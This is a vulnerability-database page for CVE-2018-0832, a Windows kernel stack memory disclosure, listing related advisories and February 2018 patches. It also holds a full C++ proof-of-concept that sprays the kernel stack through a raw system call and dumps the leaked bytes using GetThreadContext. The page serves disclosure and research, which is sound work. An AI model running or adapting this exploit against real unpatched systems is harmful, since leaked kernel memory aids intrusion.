Vulners
Lucene search
Windows Kernel stack memory disclosure in nt!RtlpCopyLegacyContextX86(CVE-2018-0832)
| Reporter | Title | Published | Views | Family All 35 |
|---|---|---|---|---|
 | Microsoft Windows Kernel - nt!RtlpCopyLegacyContextX86 Stack Memory Disclosure Exploit | 20 Feb 201800:00 | – | zdt |
 | CVE-2018-0832 | 20 Feb 201800:00 | – | circl |
 | Microsoft Windows kernel local information disclosure vulnerability (CNVD-2018-05062) | 26 Feb 201800:00 | – | cnvd |
 | CVE-2018-0832 | 15 Feb 201802:00 | – | cve |
 | CVE-2018-0832 | 15 Feb 201802:00 | – | cvelist |
 | EUVD-2018-1637 | 15 Feb 201802:00 | – | euvd |
 | February 13, 2018—KB4074588 (OS Build 16299.248) | 13 Feb 201808:00 | – | mskb |
| February 13, 2018—KB4074590 (OS Build 14393.2068) | 13 Feb 201808:00 | – | mskb |
| February 13, 2018—KB4074591 (OS Build 10586.1417) | 13 Feb 201808:00 | – | mskb |
| February 13, 2018—KB4074592 (OS Build 15063.909) | 13 Feb 201808:00 | – | mskb |
10
#include <Windows.h>
#include <cstdio>
// For native 32-bit execution.
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
__asm {mov eax, ApiNumber};
__asm {lea edx, ApiNumber + 4};
__asm {int 0x2e};
}
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
for (ULONG i = 0; i < size; i++) {
ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Windows 10 32-bit version 1709.
CONST ULONG __NR_NtGdiEngCreatePalette = 0x1296;
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static BYTE buffer[1024];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
SystemCall32(__NR_NtGdiEngCreatePalette, 1, sizeof(buffer) / sizeof(DWORD), buffer, 0, 0, 0);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
int main() {
// Initialize the thread as GUI.
LoadLibrary(L"user32.dll");
CONTEXT ctx;
RtlZeroMemory(&ctx, sizeof(ctx));
ctx.ContextFlags = CONTEXT_FLOATING_POINT;
SprayKernelStack();
if (!GetThreadContext(GetCurrentThread(), &ctx)) {
printf("GetThreadContext failed, %d\n", GetLastError());
return 1;
}
PrintHex((PBYTE)&ctx, sizeof(ctx));
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Feb 2018 00:00Current
6.1Medium risk
Vulners AI Score6.1
EPSS0.17062